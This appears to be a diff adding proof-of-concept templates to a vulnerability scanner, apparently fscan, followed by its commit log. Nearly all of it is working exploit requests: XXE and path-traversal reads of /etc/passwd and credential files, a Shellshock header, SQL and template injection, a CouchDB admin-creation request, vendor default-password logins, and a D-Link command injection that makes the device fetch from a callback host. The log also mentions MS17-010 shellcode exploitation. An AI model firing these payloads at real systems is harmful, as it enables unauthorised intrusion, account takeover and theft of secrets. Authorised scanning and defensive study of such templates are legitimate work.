+    path: /nifi-api/flow/current-user
+    follow_redirects: false
+    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
+detail:
+    author: wulalalaaa(https://github.com/wulalalaaa)
+    links:
+        - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
--- a/WebScan/pocs/apache-ofbiz-cve-2018-8033-xxe.yml
+++ b/WebScan/pocs/apache-ofbiz-cve-2018-8033-xxe.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-apacheofbiz-cve-2018-8033-xxe
+name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
 rules:
  - method: POST
    path: /webtools/control/xmlrpc
@@ -8,8 +8,8 @@ rules:
      <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
    follow_redirects: false
    expression: >
-      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml")
+      response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body)
 detail:
  author: su(https://suzzz112113.github.io/#blog)
  links:
-    - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
+    - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
--- a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml
+++ b/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml
@@ -11,7 +11,7 @@ rules:
      version="1.0"?><methodCall><methodName>{{rand}}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
    follow_redirects: false
    expression: >
-      response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
 detail:
  author: su(https://suzzz112113.github.io/#blog)
  links:
--- a/WebScan/pocs/aspcms-backend-leak.yml
+++ b/WebScan/pocs/aspcms-backend-leak.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-aspcms-backend-leak
+rules:
+  - method: GET
+    path: /plug/oem/AspCms_OEMFun.asp
+    expression: |
+      response.status == 200 && "<script>alert".bmatches(response.body) && "top.location.href='(.*?)';".bmatches(response.body)
+    search: >-
+        (?P<path>(/(.*?).asp))
+  - method: GET
+    path: /{{path}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"username")
+detail:
+  author: Hzllaga
+  links:
+    - https://www.onebug.org/wooyundata/65458.html
--- a/WebScan/pocs/backup-file.yml
+++ b/WebScan/pocs/backup-file.yml
@@ -0,0 +1,64 @@
+name: poc-yaml-backup-file
+set:
+  host: request.url.domain
+sets:
+  path:
+    - "sql"
+    - "www"
+    - "wwwroot"
+    - "index"
+    - "backup"
+    - "back"
+    - "data"
+    - "web"
+    - "db"
+    - "database"
+    - "ftp"
+    - "admin"
+    - "upload"
+    - "package"
+    - "sql"
+    - "old"
+    - "test"
+    - "root"
+    - "beifen"
+    - host
+  ext:
+    - "zip"
+    - "7z"
+    - "rar"
+    - "gz"
+    - "tar.gz"
+    - "db"
+    - "bak"
+
+rules:
+  - method: GET
+    path: /{{path}}.{{ext}}
+    follow_redirects: false
+    continue: true
+    expression: |
+      response.content_type.contains("application/") &&
+      (response.body.startsWith("377ABCAF271C".hexdecode()) ||
+      response.body.startsWith("314159265359".hexdecode()) ||
+      response.body.startsWith("53514c69746520666f726d6174203300".hexdecode()) ||
+      response.body.startsWith("1f8b".hexdecode()) ||
+      response.body.startsWith("526172211A0700".hexdecode()) ||
+      response.body.startsWith("FD377A585A0000".hexdecode()) ||
+      response.body.startsWith("1F9D".hexdecode()) ||
+      response.body.startsWith("1FA0".hexdecode()) ||
+      response.body.startsWith("4C5A4950".hexdecode()) ||
+      response.body.startsWith("504B0304".hexdecode()) )
+#      - "377ABCAF271C"  # 7z
+#      - "314159265359"  # bz2
+#      - "53514c69746520666f726d6174203300"  # SQLite format 3.
+#      - "1f8b"  # gz tar.gz
+#      - "526172211A0700"  # rar RAR archive version 1.50
+#      - "526172211A070100"  # rar RAR archive version 5.0
+#      - "FD377A585A0000"  # xz tar.xz
+#      - "1F9D"  # z tar.z
+#      - "1FA0"  # z tar.z
+#      - "4C5A4950"  # lz
+#      - "504B0304"  # zip
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
--- a/WebScan/pocs/bash-cve-2014-6271.yml
+++ b/WebScan/pocs/bash-cve-2014-6271.yml
@@ -0,0 +1,14 @@
+name: poc-yaml-bash-cve-2014-6271
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    headers:
+      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
+    follow_redirects: false
+    expression: response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: neal1991(https://github.com/neal1991)
+  links:
+    - https://github.com/opsxcq/exploit-CVE-2014-6271
--- a/WebScan/pocs/cacti-weathermap-file-write.yml
+++ b/WebScan/pocs/cacti-weathermap-file-write.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-cacti-weathermap-file-write
+rules:
+  - method: GET
+    path: >-
+      /plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7
+    follow_redirects: false
+    expression: response.status == 200
+  - method: GET
+    path: /plugins/weathermap/configs/test.php
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"46ea1712d4b13b55b3f680cc5b8b54e8")
+detail:
+  author: whynot(https://github.com/notwhy)
+  links:
+    - https://www.secpulse.com/archives/47690.html
--- a/WebScan/pocs/chinaunicom-modem-default-password.yml
+++ b/WebScan/pocs/chinaunicom-modem-default-password.yml
@@ -0,0 +1,9 @@
+name: poc-yaml-chinaunicom-modem-default-password
+rules:
+  - method: POST
+    path: /cu.html
+    body: >-
+      frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
+    follow_redirects: false
+    expression: |
+      response.status == 302 && response.headers["location"] == "/menu.gch"
--- a/WebScan/pocs/citrix-cve-2019-19781-path-traversal.yml
+++ b/WebScan/pocs/citrix-cve-2019-19781-path-traversal.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-citrix-cve-2019-19781-path-traversal
+rules:
+  - method: GET
+    path: /vpn/../vpns/cfg/smb.conf
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
+detail:
+  author: su(https://suzzz112113.github.io/#blog)
+  links:
+    - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
--- a/WebScan/pocs/citrix-cve-2020-8191-xss.yml
+++ b/WebScan/pocs/citrix-cve-2020-8191-xss.yml
@@ -0,0 +1,18 @@
+name: poc-yaml-citrix-cve-2020-8191-xss
+set:
+  r1: randomLowercase(6)
+rules:
+  - method: POST
+    path: /menu/stapp
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
+    follow_redirects: true
+    expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>")) && response.body.bcontains(b"citrix")
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://support.citrix.com/article/CTX276688
+    - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
+    - https://dmaasland.github.io/posts/citrix.html
--- a/WebScan/pocs/citrix-cve-2020-8193-unauthorized.yml
+++ b/WebScan/pocs/citrix-cve-2020-8193-unauthorized.yml
@@ -0,0 +1,20 @@
+name: poc-yaml-citrix-cve-2020-8193-unauthorized
+set:
+  user: randomLowercase(8)
+  pass: randomLowercase(8)
+rules:
+  - method: POST
+    path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
+    headers:
+      Content-Type: application/xml
+      X-NITRO-USER: '{{user}}'
+      X-NITRO-PASS: '{{pass}}'
+    body: <appfwprofile><login></login></appfwprofile>
+    follow_redirects: false
+    expression: >
+        response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
+detail:
+  author: bufsnake(https://github.com/bufsnake)
+  links:
+    - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
+    - https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html
--- a/WebScan/pocs/citrix-xenmobile-cve-2020-8209.yml
+++ b/WebScan/pocs/citrix-xenmobile-cve-2020-8209.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-citrix-xenmobile-cve-2020-8209
+rules:
+  - method: GET
+    path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8209
--- a/WebScan/pocs/coldfusion-cve-2010-2861-lfi.yml
+++ b/WebScan/pocs/coldfusion-cve-2010-2861-lfi.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-coldfusion-cve-2010-2861-lfi
+rules:
+  - method: GET
+    path: >-
+      /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
+detail:
+  version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
+  author: sharecast
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
--- a/WebScan/pocs/confluence-cve-2015-8399.yml
+++ b/WebScan/pocs/confluence-cve-2015-8399.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-confluence-cve-2015-8399
+rules:
+  - method: GET
+    path: /spaces/viewdefaultdecorator.action?decoratorName
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
+detail:
+  author: whynot(https://github.com/notwhy)
+  links:
+    - https://www.anquanke.com/vul/id/1150798
--- a/WebScan/pocs/confluence-cve-2019-3396-lfi.yml
+++ b/WebScan/pocs/confluence-cve-2019-3396-lfi.yml
@@ -0,0 +1,17 @@
+name: poc-yaml-confluence-cve-2019-3396-lfi
+rules:
+  - method: POST
+    path: /rest/tinymce/1/macro/preview
+    headers:
+      Content-Type: "application/json"
+      Host: localhost
+      Referer: http://localhost
+    body: >-
+      {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<param-name>contextConfigLocation</param-name>")
+detail:
+  author: sharecast
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396
--- a/WebScan/pocs/confluence-cve-2021-26084.yml
+++ b/WebScan/pocs/confluence-cve-2021-26084.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-confluence-cve-2021-26084
+set:
+  r1: randomInt(100000, 999999)
+  r2: randomInt(100000, 999999)
+rules:
+  - method: POST
+    path: /pages/createpage-entervariables.action?SpaceKey=x
+    body: |
+      queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: Loneyer(https://github.com/Loneyers)
+  links:
+    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
--- a/WebScan/pocs/confluence-cve-2021-26085-arbitrary-file-read.yml
+++ b/WebScan/pocs/confluence-cve-2021-26085-arbitrary-file-read.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
+set:
+    rand: randomLowercase(6)
+rules:
+  - method: GET
+    path: /s/{{rand}}/_/;/WEB-INF/web.xml
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
+detail:
+    author: wulalalaaa(https://github.com/wulalalaaa)
+    links:
+        - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
--- a/WebScan/pocs/consul-rexec-rce.yml
+++ b/WebScan/pocs/consul-rexec-rce.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-consul-rexec-rce
+rules:
+  - method: GET
+    path: /v1/agent/self
+    expression: |
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")
+detail:
+  author: imlonghao(https://imlonghao.com/)
+  links:
+    - https://www.exploit-db.com/exploits/46073
--- a/WebScan/pocs/consul-service-rce.yml
+++ b/WebScan/pocs/consul-service-rce.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-consul-service-rce
+rules:
+  - method: GET
+    path: /v1/agent/self
+    expression: |
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")
+detail:
+  author: imlonghao(https://imlonghao.com/)
+  links:
+    - https://www.exploit-db.com/exploits/46074
--- a/WebScan/pocs/couchcms-cve-2018-7662.yml
+++ b/WebScan/pocs/couchcms-cve-2018-7662.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-couchcms-cve-2018-7662
+rules:
+  - method: GET
+    path: /includes/mysql2i/mysql2i.func.php
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")
+  - method: GET
+    path: /addons/phpmailer/phpmailer.php
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")
+detail:
+  author: we1x4n(https://we1x4n.github.io/)
+  links:
+    - https://github.com/CouchCMS/CouchCMS/issues/46
--- a/WebScan/pocs/couchdb-cve-2017-12635.yml
+++ b/WebScan/pocs/couchdb-cve-2017-12635.yml
@@ -0,0 +1,24 @@
+name: poc-yaml-couchdb-cve-2017-12635
+set:
+  r1: randomLowercase(32)
+rules:
+  - method: PUT
+    path: '/_users/org.couchdb.user:{{r1}}'
+    headers:
+      Content-Type: application/json
+      Content-Length: '192'
+    body: |-
+      {
+        "type": "user",
+        "name": "{{r1}}",
+        "roles": ["_admin"],
+        "roles": [],
+        "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
+      }
+    follow_redirects: false
+    expression: |
+      response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
+detail:
+  author: j4ckzh0u(https://github.com/j4ckzh0u)
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
--- a/WebScan/pocs/couchdb-unauth.yml
+++ b/WebScan/pocs/couchdb-unauth.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-couchdb-unauth
+rules:
+  - method: GET
+    path: /_config
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager")
+detail:
+  author: FiveAourThe(https://github.com/FiveAourThe)
+  links:
+    - https://www.seebug.org/vuldb/ssvid-91597
--- a/WebScan/pocs/craftcms-seomatic-cve-2020-9757-rce.yml
+++ b/WebScan/pocs/craftcms-seomatic-cve-2020-9757-rce.yml
@@ -0,0 +1,20 @@
+name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+groups:
+  poc1:
+    - method: GET
+      path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
+      expression: |
+        response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
+  poc2:
+    - method: GET
+      path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
+      expression: |
+        response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: x1n9Qi8
+  links:
+    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757
--- a/WebScan/pocs/datang-ac-default-password-cnvd-2021-04128.yml
+++ b/WebScan/pocs/datang-ac-default-password-cnvd-2021-04128.yml
@@ -0,0 +1,14 @@
+name: poc-yaml-datang-ac-default-password-cnvd-2021-04128
+rules:
+  - method: POST
+    path: /login.cgi
+    follow_redirects: false
+    body: >-
+      user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
+    expression: |
+      response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
+
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128
--- a/WebScan/pocs/dedecms-carbuyaction-fileinclude.yml
+++ b/WebScan/pocs/dedecms-carbuyaction-fileinclude.yml
@@ -0,0 +1,22 @@
+name: poc-yaml-dedecms-carbuyaction-fileinclude
+rules:
+  - method: GET
+    path: /plus/carbuyaction.php?dopost=return&code=../../
+    headers:
+      Cookie: code=alipay
+    follow_redirects: true
+    expression: |
+      response.status == 200
+  - method: GET
+    path: /plus/carbuyaction.php?dopost=return&code=../../
+    headers:
+      Cookie: code=cod
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
+
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "DedeCmsV5.x"
+  links:
+    - https://www.cnblogs.com/milantgh/p/3615986.html
--- a/WebScan/pocs/dedecms-cve-2018-6910.yml
+++ b/WebScan/pocs/dedecms-cve-2018-6910.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-dedecms-cve-2018-6910
+rules:
+  - method: GET
+    path: /include/downmix.inc.php
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
+detail:
+  author: PickledFish(https://github.com/PickledFish)
+  links:
+    - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
--- a/WebScan/pocs/dedecms-cve-2018-7700-rce.yml
+++ b/WebScan/pocs/dedecms-cve-2018-7700-rce.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-dedecms-cve-2018-7700-rce
+set:
+  r: randomInt(2000000000, 2100000000)
+rules:
+  - method: GET
+    path: >-
+      /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "V5.7SP2正式版(2018-01-09)"
+  links:
+    - https://xz.aliyun.com/t/2224
--- a/WebScan/pocs/dedecms-guestbook-sqli.yml
+++ b/WebScan/pocs/dedecms-guestbook-sqli.yml
@@ -0,0 +1,26 @@
+name: poc-yaml-dedecms-guestbook-sqli
+set:
+  r: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: /plus/guestbook.php
+    follow_redirects: true
+    expression: |
+      response.status == 200
+    search: action=admin&id=(?P<articleid>\d{1,20})
+  - method: GET
+    path: /plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg=',msg=@`'`,msg=(selecT md5({{r}})),email='
+    follow_redirects: true
+    expression: |
+      response.status == 200
+  - method: GET
+    path: /plus/guestbook.php
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
+
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "5.7"
+  links:
+    - https://blog.csdn.net/god_7z1/article/details/8180454
--- a/WebScan/pocs/dedecms-membergroup-sqli.yml
+++ b/WebScan/pocs/dedecms-membergroup-sqli.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-dedecms-membergroup-sqli
+set:
+  r: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: >-
+      /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'`
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "5.6,5.7"
+  links:
+    - http://www.dedeyuan.com/xueyuan/wenti/1244.html
--- a/WebScan/pocs/dedecms-url-redirection.yml
+++ b/WebScan/pocs/dedecms-url-redirection.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-dedecms-url-redirection
+rules:
+  - method: GET
+    path: >-
+      /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
+    follow_redirects: false
+    expression: >
+      response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com"
+detail:
+  author: cc_ci(https://github.com/cc8ci)
+  Affected Version: "V5.7 sp1"
+  links:
+    - https://blog.csdn.net/ystyaoshengting/article/details/82734888
--- a/WebScan/pocs/discuz-v72-sqli.yml
+++ b/WebScan/pocs/discuz-v72-sqli.yml
@@ -0,0 +1,14 @@
+name: poc-yaml-discuz-v72-sqli
+rules:
+  - method: GET
+    path: >-
+      /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info</b>: MySQL Query Error")
+detail:
+  author: leezp
+  Affected Version: "discuz <=v7.2"
+  vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20"
+  links:
+    - https://blog.csdn.net/weixin_40709439/article/details/82780606
--- a/WebScan/pocs/discuz-wechat-plugins-unauth.yml
+++ b/WebScan/pocs/discuz-wechat-plugins-unauth.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-discuz-wechat-plugins-unauth
+rules:
+  - method: GET
+    path: '/plugin.php?id=wechat:wechat&ac=wxregister'
+    follow_redirects: false
+    expression: |
+      response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
+detail:
+  author: JrD
+  links:
+    - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI
--- a/WebScan/pocs/discuz-wooyun-2010-080723.yml
+++ b/WebScan/pocs/discuz-wooyun-2010-080723.yml
@@ -0,0 +1,17 @@
+name: poc-yaml-discuz-wooyun-2010-080723
+set:
+  rand: randomInt(200000000, 210000000)
+rules:
+  - method: GET
+    path: >-
+      /viewthread.php?tid=10
+    headers:
+      Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
+detail:
+  version: Discuz 7.x/6.x
+  author: Loneyer
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723
--- a/WebScan/pocs/django-CVE-2018-14574.yml
+++ b/WebScan/pocs/django-CVE-2018-14574.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-django-CVE-2018-14574
+
+rules:
+  - method: GET
+    path: //www.example.com
+    follow_redirects: false
+    expression: response.status == 301 && response.headers['location']=="//www.example.com/"
+
+detail:
+    author: ivan
+    links:
+        - https://github.com/vulhub/vulhub/tree/master/django/CVE-2018-14574 
--- a/WebScan/pocs/dlink-850l-info-leak.yml
+++ b/WebScan/pocs/dlink-850l-info-leak.yml
@@ -0,0 +1,17 @@
+name: poc-yaml-dlink-850l-info-leak
+rules:
+  - method: POST
+    path: /hedwig.cgi
+    headers:
+      Content-Type: text/xml
+      Cookie: uid=R8tBjwtFc8
+    body: |-
+      <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
+detail:
+  author: cc_ci(https://github.com/cc8ci)
+  Affected Version: "Dir-850L"
+  links:
+    - https://xz.aliyun.com/t/2941
--- a/WebScan/pocs/dlink-cve-2019-16920-rce.yml
+++ b/WebScan/pocs/dlink-cve-2019-16920-rce.yml
@@ -0,0 +1,19 @@
+name: poc-yaml-dlink-cve-2019-16920-rce
+set:
+  reverse: newReverse()
+  reverseURL: reverse.url
+rules:
+  - method: POST
+    path: /apply_sec.cgi
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && reverse.wait(5)
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://www.anquanke.com/post/id/187923
+    - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
--- a/WebScan/pocs/dlink-cve-2019-17506.yml
+++ b/WebScan/pocs/dlink-cve-2019-17506.yml
@@ -7,7 +7,7 @@ rules:
    body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
    follow_redirects: false
    expression: >
-      response.status == 200 && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
 detail:
  author: l1nk3r,Huasir(https://github.com/dahua966/)
  links:
--- a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml
+++ b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-dlink-cve-2020-25078-account-disclosure
+rules:
+  - method: GET
+    path: >-
+      /config/getuser?index=0
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
+
+detail:
+  author: kzaopa(https://github.com/kzaopa)
+  links:
+    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
影舞者	30df6b651f	加入手工gc回收,尝试节省无用内存。 -url 支持逗号隔开。修复一个poc模块bug。	2022-07-06 21:42:00 +08:00
影舞者	6e5642c508	update README.md	2022-07-05 12:59:23 +08:00
影舞者	2a6491808d	update README.md	2022-07-05 12:50:28 +08:00
影舞者	0146a941cf	update README.md	2022-07-05 12:49:04 +08:00
影舞者	67f30bf4e3	Merge pull request #197 from u21h2/main 使用毫秒作为随机数种子，避免生成的ceye子域名相同，导致反连平台误报	2022-07-03 23:53:47 +08:00
影舞者	f2239b6c9f	减少pocinfo结构体大小	2022-07-03 23:48:06 +08:00
影舞者	b9b5eb9ce4	减少info结构体大小	2022-07-03 23:41:39 +08:00
U21H2	4b596180a3	Update check.go 使用毫秒作为随机数种子，避免生成的ceye子域名相同	2022-07-03 23:07:25 +08:00
影舞者	8e1db5995e	加强poc fuzz模块,支持跑备份文件、目录、shiro-key(默认跑10key,可用-full参数跑100key)等。新增ms17017利用(使用参数: -sc add),可在ms17010-exp.go自定义shellcode,内置添加用户等功能。新增poc、指纹。支持socks5代理。因body指纹更全,默认不再跑ico图标。	2022-07-02 17:25:15 +08:00
影舞者	b1d85833a7	update	2022-06-26 19:54:38 +08:00
影舞者	fdffb369c9	update	2022-06-13 10:27:23 +08:00
影舞者	a2573e10bb	Merge remote-tracking branch 'origin/main'	2022-05-26 11:28:35 +08:00
影舞者	198abff115	update	2022-05-26 11:23:19 +08:00
影舞者	cf9389e879	Merge pull request #174 from jindaxia/main poc: add f5 big-ip cve-2022-1388 poc	2022-05-19 17:43:17 +08:00
